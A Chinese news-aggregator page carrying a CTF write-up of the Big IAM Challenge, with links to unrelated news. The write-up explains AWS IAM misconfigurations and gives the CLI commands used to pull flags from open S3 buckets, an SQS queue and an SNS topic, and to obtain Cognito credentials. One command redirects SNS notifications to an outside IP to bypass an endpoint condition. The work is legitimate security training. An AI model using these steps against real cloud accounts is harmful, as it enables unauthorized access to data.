最新要闻
- 【世界热闻】马价十倍说明了什么道理_马价十倍
- 我们该怎么帮助年轻人就业
- 2.5万元的Vision Pro问世 荣耀赵明:整个行业都应该感谢苹果_最新快讯
- 焦点资讯:帕萨特提车第二天就严重抖动 车主:车子像是仿佛在蹦
- 荣耀赵明:面对最强对手苹果竞争 荣耀整合核心能力突破
- 荣耀Magic V2即将发布 赵明:折叠屏将是未来最优解
- 贵州6人吃野生菌4人被送云南抢救:误食亚稀褶红菇、严重可致死
- 呼和浩特市:69处党政机关、企事业单位内部车场共享开放
- 每日快报!高温持续驻守华北黄淮等地 长江中下游降雨增强
- 游客自驾游开车压草场牧民损失数万 无视警示牌:官方回应
- 世界简讯:建全自主半导体产业链几乎不可能!ASML找强援:加速推进新一代光刻机
- 全球聚焦:频繁被黑!警惕抹黑清华的舆论倾向 网友支持:严惩造谣者
- 特斯拉Model 3一头扎进农田 只是因为捡一个瓶子 全球滚动
- 行政拘留能暂缓执行吗
- 时代的眼泪!Kindle中国电子书店正式停运:这下真要盖泡面了-天天即时看
- 华为搞定6G赫兹技术验证:可实现10Gbps下行速率_世界速看
手机
光庭信息跌4.57% 2021上市超募11亿2022扣非降74% 时快讯
搜狐汽车全球快讯 | 大众汽车最新专利曝光:仪表支持拆卸 可用手机、平板替代-环球关注
- 光庭信息跌4.57% 2021上市超募11亿2022扣非降74% 时快讯
- 搜狐汽车全球快讯 | 大众汽车最新专利曝光:仪表支持拆卸 可用手机、平板替代-环球关注
- 视点!美国首位女总统即将诞生?拜登恐怕要提前下岗,美政坛迎来变局?
- 当前速递!用理想仪器实现更好的颗粒 德国新帕泰克亮相CPHI & PMEC China获好评
- 微粒贷怎么申请开通 开通方法如下
- 焦点简讯:心疼!这位40岁的云南缉毒警,已是满头白发
家电
IAM风险CTF挑战赛
wiz启动了一个名为“The Big IAM Challenge”云安全CTF挑战赛。旨在让白帽子识别和利用 IAM错误配置,并从现实场景中学习,从而更好的认识和了解IAM相关的风险。比赛包括6个场景,每个场景都专注于各种AWS服务中常见的IAM配置错误。
Challenge1:
Buckets of Fun
(资料图片)
We all know that public buckets are risky. But can you find the flag?
查看提示获取本关的IAM策略如下:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", //Effect(效果)设置为Allow(允许) "Principal": "*", //Principal(主体)是所有用户("*") "Action": "s3:GetObject", //获取对象 "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*" //指定S3存储桶中的所有对象 }, { "Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket", //列出存储桶 "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b", "Condition": { //条件是通过前缀限制只能列出以"files/"为前缀的对象 "StringLike": { "s3:prefix": "files/*" } } } ]}
该策略允许任何用户列出"thebigiamchallenge-storage-9979f4b"存储桶中符合前缀条件"files/"的对象。该策略存在如下安全风险:
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
1、允许任何用户对指定的S3存储桶执行GetObject操作以获取对象的内容。
2、允许任何用户对指定的S3存储桶执行ListBucket操作列出存储桶中符合指定前缀条件的对象
解题思路:
针对s3存储桶权限校验不严格,列出桶资源对象并使用查看对象内容获取flag。
1、获取该存储桶中的对象
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
得知files目录下存在flag1.txt文件,将其下载到本地,这里提示Read-only file system(只读文件系统)错误,权限问题,我们将其下载到/tmp目录下:
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/flag.txt
另外也可以直接网络访问获取:
http://s3.amazonaws.com/thebigiamchallenge-storage-9979f4b/files/flag1.txt
获得flag如下:
{wiz:exposed-storage-risky-as-usual}
Challenge2:
We created our own analytics system specifically for this challenge. We think it"s so good that we even used it on this page. What could go wrong?
Join our queue and get the secret flag.
查看提示获取本关的IAM策略如下:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": [ "sqs:SendMessage", //发送消息 "sqs:ReceiveMessage" //接收消息 ], "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2" } ]}
该IAM策略允许任何用户对特定的SQS队列执行SendMessage和ReceiveMessage操作,即发送和接收消息。该策略存在如下安全风险:
1、该策略将操作权限授予了所有用户("*"),意味着任何具有该策略的用户或角色都可以发送和接收消息。
2、该策略没有限制允许访问的用户、角色或其他条件。它允许所有用户执行SendMessage和ReceiveMessage操作。
解题思路:
针对授予特定SQS队列执行ReceiveMessage操作获取队列消息来查找flag。
1、接受消息队列中的信息
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
2、获取html文件内容
https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
获得flag如下:
{wiz:you-are-at-the-front-of-the-queue}
Challenge3:
Enable Push Notifications
We got a message for you. Can you get it?
查看提示并获取本关的IAM策略如下:
{ "Version": "2008-10-17", "Id": "Statement1", "Statement": [ { "Sid": "Statement1", "Effect": "Allow", "Principal": { "AWS": "*" //允许任何AWS用户 }, "Action": "SNS:Subscribe", //订阅操作 "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications", //主题ARN "Condition": { "StringLike": { "sns:Endpoint": "*@tbic.wiz.io" //订阅条件 } } } ]}
该策略允许任何AWS用户对指定的SNS主题(ARN为"arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications")进行订阅操作。订阅条件要求订阅者的Endpoint必须以"*@tbic.wiz.io"结尾。该策略存在如下风险:
全局访问权限:该策略中指定了允许任何AWS用户("*")执行SNS订阅操作。这意味着任何具有有效的AWS凭证的用户都可以订阅该SNS主题。如果此策略不是有意为特定用户或实体设计的,可能存在风险,因为未经授权的用户可以执行订阅操作。
通配符条件:该策略中的条件指定订阅者的Endpoint必须以"*@tbic.wiz.io"结尾。然而,通配符条件可能过于宽松,允许任何以该域名结尾的Endpoint进行订阅,包括未经授权的Endpoint。这可能导致未经授权的实体订阅主题并接收敏感信息或滥用SNS服务。
潜在的信息泄露:由于该策略允许任何人订阅主题,如果主题包含敏感信息或重要通知,可能会导致信息泄露的风险。攻击者可以订阅主题并接收敏感信息,甚至利用该信息进行其他恶意行为。
解题思路:
1、订阅SNS主题
在订阅时由于调阅条件的限制,先尝试将订阅消息发送到email邮箱账号,但是由于我们没有以@tbic.wiz.io为后缀的邮箱账号,因此需要对此处进行绕过。
AWS用户可以使用SNS:Subscribe操作订阅指定的SNS主题:
aws sns subscribe --topic-arn <主题ARN> --protocol <协议> --notification-endpoint <订阅者Endpoint>
<主题ARN>为实际的SNS主题ARN。所使用的协议有HTTP、HTTPS、Email、SMS等,订阅者的Endpoint具体根据策略中的条件要求。
对该题目设置SNS订阅:
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol email --notification-endpoint research@tbic.wiz.io
2、订阅条件限制绕过
尝试使用http协议进行代理监听的方式获取订阅消息:
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol http --notification-endpoint http://43.155.79.163:8443/@tbic.wiz.io
接收到来自sns的订阅确认,消息提示点击SubscribeURL确认订阅消息,等待一会即可接收到附带flag的订阅消息:
获取到flag如下:
{wiz:always-suspect-asterisks}
Challenge4:
Admin only?
We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
查看提示并获取本关的IAM策略如下:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*" }, { "Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321", "Condition": { "StringLike": { "s3:prefix": "files/*" }, "ForAllValues:StringLike": { "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin" } } } ]}
该策略用于定义对 Amazon S3 存储桶的访问权限。其中包含了两个声明(Statement):
1、声明一允许任何用户存储桶执行GetObject操作,访问thebigiamchallenge-admin-storage-abf1321的s3储存桶资源。
2、声明二允许任何用户对S3存储桶执行ListBucket操作,列出存储桶中的对象。该声明有一个约束条件限制请求中的后缀必须以"files/" 开头,并且访问资源的主体是arn:aws:iam::133713371337:user/admin。
解题思路:
看到声明二中限制的访问资源主体是arn:aws:iam::133713371337:user/admin,便想着如何获取到该用户的凭据,然而在目前的环境中翻遍了各种配置文件和脚本文件都未发现相关凭据泄露,且当下凭据不能用于该访问主体。随后转变思路利用GetObject操作无限制进行目录Fuzz,Fuzz出如下路径:
/thebigiamchallenge-admin-storage-abf1321/files/ /thebigiamchallenge-admin-storage-abf1321/files/cache//thebigiamchallenge-admin-storage-abf1321/files/tmp/https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt
然后再深一次Fuzz,仍无flag相关结果,最终经瑞幸楼少提醒,发现了如下参数的妙用:
--no-sign-request
该参数可以用来执行无需身份验证的请求。使用该参数可以跳过对请求进行签名和身份验证的步骤,从而可以在某些情况下执行不需要验证的操作。
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-requestaws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt /tmp/flag4.txt
获得flag如下:
{wiz:principal-arn-is-not-what-you-think}
Challenge5:
Do I know you?
We configured AWS Cognito as our main identity provider. Let"s hope we didn"t make any mistakes.
查看提示并获取本关的IAM策略如下:
{ "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "mobileanalytics:PutEvents", "cognito-sync:*" ], "Resource": "*" }, { "Sid": "VisualEditor1", "Effect": "Allow", "Action": [ "s3:GetObject", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::wiz-privatefiles", "arn:aws:s3:::wiz-privatefiles/*" ] } ]}https://wiz-privatefiles.s3.amazonaws.com/https://s3.amazonaws.com/wiz-privatefiles/https://wiz-privatefiles.s3.amazonaws.com/soap/
如上策略有两个声明,VisualEditor0声明允许向MobileAnalytics服务发送事件数据以及对Cognito Sync服务执行任何操作,且对这两个服务中的所有资源都可以操作。VisualEditor1声明允许执行GetObject和ListBucket两个操作,来获取wiz-privatefiles存储桶中的对象并列出存储桶中的内容。
解题思路:
根据题目提示得知AWS Cognito服务为主要身份提供商,问题大概率出现在此处,通过搜索AWS Cognito配置错误看到一篇文章:
https://www.wangan.com/p/7fy7f8abba5c0234 //通过错误配置的AWS Cognito接管AWS帐户
结合该思路我们首先需要获取到该AWS Cognito服务的identity_pool_id:
梳理下常见的获取identity_pool_id方法:
1、通过应用程序代码查找使用Cognito的部分,并寻找可能存在identity_pool_id的位置,通常在一些JS文件或者接口中可能存在。
2、通过监控分析网络流量分析捕获应用程序与Cognito之间的通信。在捕获的网络流量中,搜索包含identity_pool_id
的请求或响应。
3、通过搜寻查找一些配置文件或环境变量及启动脚本等获取Cognito相关的配置信息。
4、通过分析应用程序日志,查找identity_pool_id
的信息。有时日志文件会记录与身份池相关的操作或配置。
5、通过aws控制台或CLI命令行获取identity_pool_id,前提是需要有一定权限。
结合文章思路在前端页面获取到IdentityPoolId:
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
获取到identity_pool_id通过脚本再获取AK密钥进行配置:
由于当前云终端权限限制的问题,改用本地进行配置及后续操作:
aws configureaws configure set aws_access_key_id aws configure set aws_secret_access_key aws configure set aws_session_token ""
获取到Flag如下:
{wiz:incognito-is-always-suspicious}
Challenge6:
One final push
Anonymous access no more. Let"s see what can you do now.
Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
查看提示并获取本关的IAM策略如下:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "cognito-identity.amazonaws.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" } } } ]}
该策略用于定义IAM角色的信任关系,当cognito-identity身份服务进行Web身份验证时,可以使用STS的AssumeRoleWithWebIdentity操作请求临时凭证进行验证身份。此操作将验证来自cognito-identity身份服务的用户身份,并根据策略规定的条件和权限,为该用户生成一组临时凭证。这些临时凭证具有一定的时效性,可用于对 AWS 资源进行访问。
解题思路:
题目中提示不再有匿名访问且需要使用身份aws:iam::092297851374:role/Cognito_s3accessAuth_Role进行操作,策略信息也指明了cognito-identity验证中的aud必须是identity_pool_id为us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b。思路如下:
1、获取身份标识符identity-id
aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
2、获取对应身份标识的令牌token
aws cognito-identity get-open-id-token --identity-id 获取到的identity-id
3、使用获取到的身份验证令牌指定目标角色来获取临时访问凭证
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name 自定义session名称 --web-identity-token 获取到的token令牌
4、根据获取到的AK密钥配置并获取flag
aws s3 lsaws s3 ls s3://wiz-privatefiles-x1000aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
获取到flag如下:
{wiz:open-sesame-or-shell-i-say-openid}
更多网安技能的在线实操练习,请点击这里>>
关键词:
IAM风险CTF挑战赛
PC网站如何实现微信扫码登录
【世界热闻】马价十倍说明了什么道理_马价十倍
【新视野】7月新规来了
我们该怎么帮助年轻人就业
2.5万元的Vision Pro问世 荣耀赵明:整个行业都应该感谢苹果_最新快讯
焦点资讯:帕萨特提车第二天就严重抖动 车主:车子像是仿佛在蹦
荣耀赵明:面对最强对手苹果竞争 荣耀整合核心能力突破
荣耀Magic V2即将发布 赵明:折叠屏将是未来最优解
贵州6人吃野生菌4人被送云南抢救:误食亚稀褶红菇、严重可致死
呼和浩特市:69处党政机关、企事业单位内部车场共享开放
一天吃透MySQL面试八股文 环球快资讯
央企的无奈:假央企何以屡禁不止?
每日快报!高温持续驻守华北黄淮等地 长江中下游降雨增强
游客自驾游开车压草场牧民损失数万 无视警示牌:官方回应
世界简讯:建全自主半导体产业链几乎不可能!ASML找强援:加速推进新一代光刻机
全球聚焦:频繁被黑!警惕抹黑清华的舆论倾向 网友支持:严惩造谣者
特斯拉Model 3一头扎进农田 只是因为捡一个瓶子 全球滚动
行政拘留能暂缓执行吗
【天天报资讯】险资:权益市场在底部区域 下半年看好科技和消费的投资价值
时代的眼泪!Kindle中国电子书店正式停运:这下真要盖泡面了-天天即时看
华为搞定6G赫兹技术验证:可实现10Gbps下行速率_世界速看
售价超28万!Caviar推出定制苹果Vision Pro:3斤18K黄金闪瞎眼 微资讯
栗新小学教师志愿服务队_关于栗新小学教师志愿服务队概略
天天通讯!读发布!设计与部署稳定的分布式系统(第2版)笔记16_握手和考验机
【环球新要闻】无糖可乐不能喝了?或含致癌物 厂商纷纷回应撇清关系
确保数字孪生水利管用好用_播资讯
小屏旗舰最后的荣光!华硕Zenfone 10图赏
国际饮料协会回应阿斯巴甜争议:系误导
双头男孩上下串联:被当畸形参观 死后还被盗尸解剖
无糖可乐或含致癌物?不能喝了?要不咱先把猪肉给戒了吧
全球热资讯!马云说阿里巴巴永远不会做快递!结果 还是真香
Epic喜+1:《纳赫鲁博王国地下城:混沌护符》!
开不了口周杰伦在线试听_开不了口周杰伦-世界观热点
今日看点:怒斥温网官方!安迪穆雷为自己鸣不平:我比阿尔卡拉斯伟大!
浙江省衢州市出现北斗智慧综合灯杆 实现全自动道路巡检
电影《封神第一部》妲己首次亮相 由新人演员娜然扮演
美团成功收购光年之外 收购价约为20.65亿人民币
市民称上海外滩夜景灯光太土 有一种浓浓的乡镇味道
科学家发现“孤雌生殖”的案例 哥斯达黎加一鳄鱼采用独特“繁殖”方式
国内首款抑郁症诊断机器人正式亮相 通过智能传输分析患者是否有抑郁症
全国首位视障播音硕士董丽娜毕业 其坚韧性格和不屈精神感动数万人
获取波场(Tron)钱包TRX、USDT余额和剩余带宽、能量 - 笔记 世界快播报
计算机专业学生暑假要去看这些经典书籍! 环球新视野
焦点播报:微服务架构必读篇 - 网关
kratos http原理 每日看点
手机问题:努比亚z30pro续航怎么样
天天播报:RTX 4060今晚上市后 尴尬一幕出现:日本线下仅1人排队买首发
重点聚焦!女子疑坐公交不付钱:踩猫威胁司机
算法导论-第14章-数据结构的扩张-全球新消息
货币市场日报:6月29日
2023年上半年剧集报告发布:国产剧口碑上涨显著
微动态丨GDDR7显存明年就有了!RTX 50可能先吃螃蟹
800V高压架构+二代XNGP辅助驾驶上车!小鹏G6上市:20.99万起 滚动
iGame人气王!七彩虹iGame RTX 4060 Ultra W OC显卡图赏
文心一言 VS 讯飞星火 VS chatgpt (51)-- 算法导论6.2 3题|全球时讯
每日观察!《异世界》魔径—給异世界点颜色看看 楔子
世界看点:华为宣布2024年推出面向商用的5.5G全套网络设备
【全球速看料】山东龙凤四胞胎同圆大学梦 网友:四倍辛苦 四倍幸福
当前信息:可以换电的纯电MPV来了!全新上汽大通大家MIFA 9车电分离版上市
世界热推荐:Kubernetes 对象以及部署nginx服务示例(四)
记录--写一个高德地图巡航功能的小DEMO
旗袍发型教程_旗袍发型-天天即时看
世界实时:债市日报:6月29日
阿斯巴甜将被世卫列为“可能致癌物质”:元气森林、奈雪火速回应
丫丫解锁新玩具竹笼:一刻也没闲着
无糖可乐不能喝了?或含致癌物阿斯巴甜
天天观焦点:Steam将AI作图游戏拒之门外!除非能证明拥有版权
环球热讯:红米Redmi Pad 2平板跑分曝光:配骁龙680 或近期发布
新市街道开展“健康无毒 喜迎大运”6.26禁毒宣传日活动
天天观点:内爆致5人遇难!美国泰坦号观光潜艇失事残骸打捞上岸
1200mAh锂电池+三档风力调节:佳格手持小风扇8.9元狂促_全球今日讯
世界时讯:最好的Windows掌机!ROG Ally暴力魔改8TB SSD:容量陡增8倍
当前热讯:重要提醒!暴雪国服游戏退款申请明日将截止
【当前独家】张颂文北影毕业典礼演讲:希望你们每天都在进步
【世界速看料】不吝赐教的意思(赐教的意思)
Spring Cloud 如何引入云原生网关,创新微服务架构|天天最新
拈花云科基于 Apache DolphinScheduler 在文旅业态下的实践
.NET 个人博客-添加RSS订阅功能 世界快播
如何将视频文件.h264和音频文件.mp3复用为输出文件output.mp4?
天天热资讯!商品日报(6月29日):尿素再度拉涨超5% 供应利多刺激甲醇盘中涨超3%
联发科MT6825芯片组获上海MWC 2023亚洲突破性设备创新大奖!手机卫星可双向通信_焦点资讯
支持Type-C充电:英菲克F1无线鼠标24.9元抄底
天天热消息:做错N多年!央视科普:鸡蛋别再放到冰箱门上了
要求罚金30亿美元!Chatgpt涉嫌信息盗窃被起诉 全球视讯
官方辟谣激情誓师女生考508分:女生考了600多分 考得特别好 环球焦点
全球低水足迹倡议(LWFi)联盟扩容,伊利“双足迹”开启全链减碳新篇章_世界视点
IDA的使用-1_世界新消息
clop勒索软件攻击活动频发,西门子能源中招_世界观察
精彩看点:构建数字工厂丨数据分析与图表视图模型的配置用法
券商数字化创新场景数据中台实践
热门看点:C# 序列化大小写 序列化对象为大小写 JsonConvert.SerializeObject
新款2024MGCyberster泄露 当前热讯
第十四届夏季达沃斯论坛闭幕
天天快讯:暴露年龄!时隔16年 Office“大眼夹”回归Windows 11:功能焕然一新
16.5亿打造!《封神》妲己首次亮相引热议 网友称妆造诡异在拍画皮吗
苹果之后 三星被指侵犯加州理工Wi-Fi专利:索赔可达数十亿美元-世界新消息
“快乐水”不快乐了!阿斯巴甜将被定为可能致癌物质|天天热资讯
华为发布F5.5G智简全光联接四大创新:万兆时代来了
讯息:大宗交易:蓝色光标成交6967.8万元,折价1.96%(06-29)